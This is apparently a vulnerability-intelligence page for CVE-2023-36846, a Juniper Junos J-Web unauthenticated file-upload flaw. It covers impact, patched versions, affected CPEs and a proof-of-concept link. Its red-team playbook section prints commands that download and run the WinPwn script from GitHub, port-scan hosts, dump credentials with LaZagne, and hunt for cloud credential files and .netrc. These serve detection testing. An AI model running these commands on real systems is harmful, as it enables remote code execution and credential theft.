CVE-2023-36846
Overview
This vulnerability is a Missing Authentication for Critical Function flaw in Juniper Networks Junos OS on SRX Series devices. The root cause is the absence of authentication checks on a specific web interface endpoint, allowing unauthenticated access to a file upload function. The affected component is the J-Web management interface, specifically the user.php endpoint that improperly permits arbitrary file uploads without verifying user credentials.
Vulnerability Description
A Missing Authentication for Critical Function vulnerability in Juniper Networks Junos OS on SRX Series allows an unauthenticated, network-based attacker to cause limited impact to the file system integrity. With a specific request to user.php that doesn't require authentication an attacker is able to upload arbitrary files via J-Web, leading to a loss of integrity for a certain part of the file system, which may allow chaining to other vulnerabilities. This issue affects Juniper Networks Junos OS on SRX Series: * All versions prior to 20.4R3-S8; * 21.1 versions 21.1R1 and later; * 21.2 versions prior to 21.2R3-S6; * 21.3 versions prior to 21.3R3-S5; * 21.4 versions prior to 21.4R3-S5; * 22.1 versions prior to 22.1R3-S3; * 22.2 versions prior to 22.2R3-S2; * 22.3 versions prior to 22.3R2-S2, 22.3R3; * 22.4 versions prior to 22.4R2-S1, 22.4R3.
Impact
An unauthenticated attacker can exploit this vulnerability remotely to upload arbitrary files to the device, compromising the integrity of the file system. No user interaction or credentials are required to perform the attack. This may enable attackers to chain this flaw with other vulnerabilities to escalate privileges or disrupt device operations, potentially leading to partial system compromise or lateral movement within the network environment.
Solution
Juniper Networks has released patches addressing this issue in Junos OS versions 20.4R3-S8, 21.2R3-S6, 21.3R3-S5, 21.4R3-S5, 22.1R3-S3, 22.2R3-S2, 22.3R2-S2, 22.3R3, 22.4R2-S1, and 22.4R3. Administrators should apply the updates as detailed in Juniper advisory JSA72300 available at https://supportportal.juniper.net/JSA72300. No alternative workarounds are provided by the vendor.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
A critical vulnerability exists within Juniper Networks' Junos OS, specifically affecting the SRX Series devices. This issue arises from a lack of authentication for essential functions, allowing unauthenticated attackers to exploit the system. The vulnerability enables an attacker to upload arbitrary files through a specific request to the user.php endpoint via the J-Web interface. This unauthorized file upload capability poses a significant risk to the integrity of the file system, as it can lead to unauthorized modifications or the introduction of malicious files, potentially compromising the entire system.
The attack vector for this vulnerability is particularly concerning due to its network-based nature, which allows attackers to exploit the flaw remotely without needing physical access to the device. An attacker could craft a malicious request to the user.php endpoint, bypassing authentication mechanisms entirely. Once the arbitrary file is uploaded, the attacker could manipulate the system further, possibly chaining this vulnerability with others to escalate privileges or gain deeper access to the network infrastructure. This scenario illustrates a clear pathway for attackers to not only compromise the integrity of the affected device but also to pivot to other systems within the network.
The real-world implications of this vulnerability are significant, especially for organizations relying on Juniper's SRX Series for their network security. The potential for unauthorized file uploads can lead to data breaches, loss of sensitive information, or even complete system outages. The integrity of the network infrastructure is paramount, and any compromise could result in severe business risks, including financial losses, reputational damage, and regulatory penalties. Organizations must recognize that the exploitation of this vulnerability could serve as a precursor to more sophisticated attacks, making it imperative to address the issue promptly.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regularly updating the Junos OS to the latest versions that address this vulnerability is crucial. Additionally, employing network intrusion detection systems (NIDS) can help identify unusual traffic patterns indicative of exploitation attempts. Organizations should also conduct thorough security assessments and penetration testing to uncover any potential weaknesses in their configurations. Implementing strict access controls and monitoring logs for unauthorized access attempts can further enhance the security posture against this and similar vulnerabilities.
In conclusion, the lack of authentication for critical functions in Junos OS on SRX Series devices presents a serious threat that requires immediate attention. The ability for an unauthenticated attacker to upload arbitrary files can lead to significant integrity issues, with potential ramifications that extend beyond the affected device. Organizations must take proactive measures to mitigate the risks associated with this vulnerability, ensuring that their network infrastructure remains secure against evolving threats. By adopting a comprehensive security strategy that includes timely updates, monitoring, and rigorous testing, organizations can better protect themselves from the consequences of such vulnerabilities.
Affected Products (89)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Juniper | Junos | All |
cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:*
|
|
|
Juniper | Junos | 20.4 |
cpe:2.3:o:juniper:junos:20.4:-:*:*:*:*:*:*
|
|
|
Juniper | Junos | 20.4 |
cpe:2.3:o:juniper:junos:20.4:r1:*:*:*:*:*:*
|
|
|
Juniper | Junos | 20.4 |
cpe:2.3:o:juniper:junos:20.4:r1-s1:*:*:*:*:*:*
|
|
|
Juniper | Junos | 20.4 |
cpe:2.3:o:juniper:junos:20.4:r2:*:*:*:*:*:*
|
|
|
Juniper | Junos | 20.4 |
cpe:2.3:o:juniper:junos:20.4:r2-s1:*:*:*:*:*:*
|
|
|
Juniper | Junos | 20.4 |
cpe:2.3:o:juniper:junos:20.4:r2-s2:*:*:*:*:*:*
|
|
|
Juniper | Junos | 20.4 |
cpe:2.3:o:juniper:junos:20.4:r3:*:*:*:*:*:*
|
|
|
Juniper | Junos | 20.4 |
cpe:2.3:o:juniper:junos:20.4:r3-s1:*:*:*:*:*:*
|
|
|
Juniper | Junos | 20.4 |
cpe:2.3:o:juniper:junos:20.4:r3-s2:*:*:*:*:*:*
|
|
|
Juniper | Junos | 20.4 |
cpe:2.3:o:juniper:junos:20.4:r3-s3:*:*:*:*:*:*
|
|
|
Juniper | Junos | 20.4 |
cpe:2.3:o:juniper:junos:20.4:r3-s4:*:*:*:*:*:*
|
|
|
Juniper | Junos | 20.4 |
cpe:2.3:o:juniper:junos:20.4:r3-s5:*:*:*:*:*:*
|
|
|
Juniper | Junos | 20.4 |
cpe:2.3:o:juniper:junos:20.4:r3-s6:*:*:*:*:*:*
|
|
|
Juniper | Junos | 20.4 |
cpe:2.3:o:juniper:junos:20.4:r3-s7:*:*:*:*:*:*
|
|
|
Juniper | Junos | 21.1 |
cpe:2.3:o:juniper:junos:21.1:r1:*:*:*:*:*:*
|
|
|
Juniper | Junos | 21.1 |
cpe:2.3:o:juniper:junos:21.1:r1-s1:*:*:*:*:*:*
|
|
|
Juniper | Junos | 21.1 |
cpe:2.3:o:juniper:junos:21.1:r2:*:*:*:*:*:*
|
|
|
Juniper | Junos | 21.1 |
cpe:2.3:o:juniper:junos:21.1:r2-s1:*:*:*:*:*:*
|
|
|
Juniper | Junos | 21.1 |
cpe:2.3:o:juniper:junos:21.1:r2-s2:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
Chocapikk/CVE-2023-36846
Remote Code Execution on Junos OS CVE-2023-36846
|
Chocapikk | 5 | 1 | 2023-08-29 | View |
Threat Feed
4 eventsSighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-36846 |
| supportportal.juniper.net |
GitHub CVE
vendor-advisory
mitigation
|
https://supportportal.juniper.net/JSA72300 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-36846 |